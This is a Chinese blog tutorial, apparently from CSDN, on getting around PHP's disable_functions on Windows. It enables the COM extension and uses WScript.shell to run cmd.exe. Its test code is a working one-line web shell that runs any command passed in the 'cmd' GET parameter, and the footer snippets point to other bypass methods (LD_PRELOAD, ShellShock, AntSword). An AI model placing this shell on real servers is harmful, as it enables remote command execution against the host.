com 组件调用不起来_COM组件绕过disable_functions

最新推荐文章于 2022-09-22 18:54:36 发布
最新推荐文章于 2022-09-22 18:54:36 发布
阅读量392 收藏
点赞数
文章标签: com 组件调用不起来 windows组件

6577193491d32d0ac0ab464c1e61b62a.png

介绍

com组件绕过适用于windows系统,组件可理解为提供某个功能的程序,主要是php代码调用windows下的WScript.shell组件来操作的。

wscript.shell

WScript.shell组件可用来操作cmd程序,可调用cmd程序来执行相关命令。在php中我们可以新建组件去调用wscript.shell,然后来操作cmd,从而来执行相关命令。

条件

php默认是不能调用外部组件的,这个需要手动开启,如果目标机开启了相关配置,这种绕过方法才能利用。首先在php.ini中添加扩展:

extension=php_com_dotnet.dll

然后将com.allow_dcom = true前面的分号去掉,取消注释:

com.allow_dcom = true

重启apache即可。

测试

测试代码如下:

<?php     header("Content-Type: text/html; charset=gb2312");    $cmd=$_GET['cmd'];    $com = new COM('WScript.shell');       $exec = $com->exec('cmd.exe /c '.$cmd);     $stdout = $exec->StdOut();    $stroutput = $stdout->ReadAll();    echo "
"
; echo $stroutput; echo " ?>

9e60e152ea9b46181881119682f0b08b.png

总结

当程序开发过程中,如果需要用到一些系统上的功能,需要和系统交互,那么就有可能是开启组件支持的,这时如果有disable_functions限制,则可以尝试使用com组件绕过。

weixin_39555951
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP 开启COM组件 读取word文件
相对静止
06-06 1万+
1.先到PHP.INI中打开COM选项,com.allow_dcom = true 2.我这里的环境是PHP5.4.7,PHP 5.4.5后,com/dotnet 模块已经成了单独的扩展,所以需要在PHP.ini中配置extension=php_com_dotnet.dll,如果PHP VERSION 配置方法为:只需在扩展列表里添加extension=php_com_dotnet.dll即可
disable_functions绕过总结
遇事不决冲冲冲
11-19 6541
提要 Linux 中 PHP 环境,已知disable_functions=exec、passthru、popen、proc_open、shell_exec、system请写出两种有可能实现任意命令执行的方式 exec <?phpecho exec('whoami');?> — 执行一个外部程序 passthru <?phppassthru("whoami");?> — 执行外部程序并且显示原始输出
php dcom扩展配置,PHP: 运行时配置 - Manual
weixin_29777019的博客
03-11 184
com.allow_dcom如果打开此选项,PHP 将被允许以一个 D-COM(DistributedCOM)客户方式操作并允许 PHP 脚本在远程服务器上实例化 COM 对象。com.autoregister_typelibWhen this is turned on, PHP will attempt to register constants fromthe typelibrary of C...
绕过disable_function
qq_51770207的博客
09-22 4086
绕过disable_function
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
针对宝塔的RASP及其disable_functions的绕过1
08-03
针对宝塔的RASP及其disable_functions的绕过 RASP(Runtime Application Self-Protection)是一种 Runtime 应用程序自我保护技术,旨在保护应用程序免受攻击和恶意活动的影响。在宝塔平台上,RASP 技术可以拦截基于...
php.ini 启用disable_functions提高安全
09-30
如果想保证服务器的安全,请将这个函数加到disable_functions里或者将安全模式打开吧,在安全模式下dl函数是无条件禁止的
绕过disable-functions共享库文件
03-04
LD_PRELOAD绕过disable_functions https://blog.csdn.net/xia739635297/article/details/104641082
利用PHP扩展模块突破Disable_functions执行命令
09-13
通过以上步骤,我们可以成功地利用PHP扩展模块绕过`disable_functions`的限制,从而执行原本被禁止的命令。这种方法对于安全研究者来说非常重要,有助于发现潜在的安全漏洞。然而,需要注意的是,在真实世界的应用中...
Windows平台的PHP之开启COM配置
蒗若晨曦
09-27 776
Windows平台的PHP如果未配置COM调用COM组件,错误如下 Fatal error: Class 'COM' not found in XXXXXXXXX php 根目录的 ext 文件夹下确保存有 php_com_dotnet.dll 这个文件 一,编辑php.ini,开启com.allow_dcom 1. 如果php版本>5.3.15 需保证php 根目录的 ext 文件夹下
php加载COM组件失败原因及其解决方法
夏末dē黄昏
02-23 1万+
在php中调用其它编程语言的接口,个人感觉最方便的就是使用COM组件了。最近小弟刚开始接触php,在研究调用c++编写的COM组件的时候遇到了“'Failed to create COM object”这个错误,费了不少功夫终于解决。 高版本的php需要手动开启支持COM,基本就是在php.ini中修改配置为com.allow_dcom = true和extension=php_com_dotn
php 调用 com组件,进行word操作,详情步骤
ken2999的博客
09-03 7707
步骤一、php开启COM组件 查看php.ini中是否已经开启了com.allow_dcom = true 从php/ext/里面查找一下有没有这个php_com_dotnet.dll这个文件 如果没有网上下载个,一般都会有的吧应该大概可能。。 然后查找这个php.ini里面查找下#extension=php_com_dotnet.dll把前面的#号去掉 如果找不到就复制,手动添加一下 ...
php如何开启COM组件
热门推荐
立足的博客
09-20 1万+
查看php.ini中是否已经开启了com.allow_dcom = true。 然后查找这个#extension=php_com_dotnet.dll把前面的#号去掉 如果没有 就从php/ext/里面查找一下有没有这个php_com_dotnet.dll 然后输出下phpinfo() 看看有没有com_dotnet COM support enabled DCOM sup
PHP利用com组件读取PDF,PHP 开启COM组件 读取word文件
weixin_31643625的博客
03-10 303
1.先到PHP.INI中打开COM选项,com.allow_dcom = true2.我这里的环境是PHP5.4.7,PHP 5.4.5后,com/dotnet 模块已经成了单独的扩展,所以需要在PHP.ini中配置extension=php_com_dotnet.dll,如果PHP VERSION<5.4.5 则不需要。否则的话,可能就是报错 Fatal error: Class 'COM...
php的COM组件调用相关(包括com_event_sink的用法)
蔡思岑的笔记
12-08 1万+
参见:http://www.phpnotes.top/2017/12/06/php/111/ 前提 需要手动在php.ini中开启 [COM_DOT_NET] extension=php_com_dotnet.dll COM配置项 COM 配置选项 名字 默认 可修改范围 更新日志 com.allow_dcom "0" PHP_INI_SY
PHP利用com组件读取PDF,php 调用com组件读取 mdb(access)文件数据
weixin_39938522的博客
03-10 178
使用注意事项PHP 5.4.5以前的版本,只需要在php.ini中把com.allow_dcom = true打开就可以了,但是5.4.5版本以后,PHP把com/dotnet 模块集成到了一个单独的扩展中,所以需要在php.ini中加一行扩展extension=php_com_dotnet.dll,是加一行,不是打开,默认配置文件中没有这一行的,然后重启IIS或Apache,再次运行就正常了!1...
php com word,php 调用 com组件,进行word操作,详情步骤
weixin_30394019的博客
03-10 519
步骤一、php开启COM组件查看php.ini中是否已经开启了com.allow_dcom = true从php/ext/里面查找一下有没有这个php_com_dotnet.dll这个文件如果没有网上下载个,一般都会有的吧应该大概可能。。然后查找这个php.ini里面查找下#extension=php_com_dotnet.dll把前面的#号去掉如果找不到就复制,手动添加一下然后输出下phpinf...
蚁剑绕过disable_functions
最新发布
12-17
根据提供的引用内容,AntSword虚拟终端中已经集成了对ShellShock的利用,可以绕过disable_functions。具体步骤如下: 1.打开AntSword虚拟终端,输入以下命令,检查是否存在ShellShock漏洞: ```bash env x='() { :...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值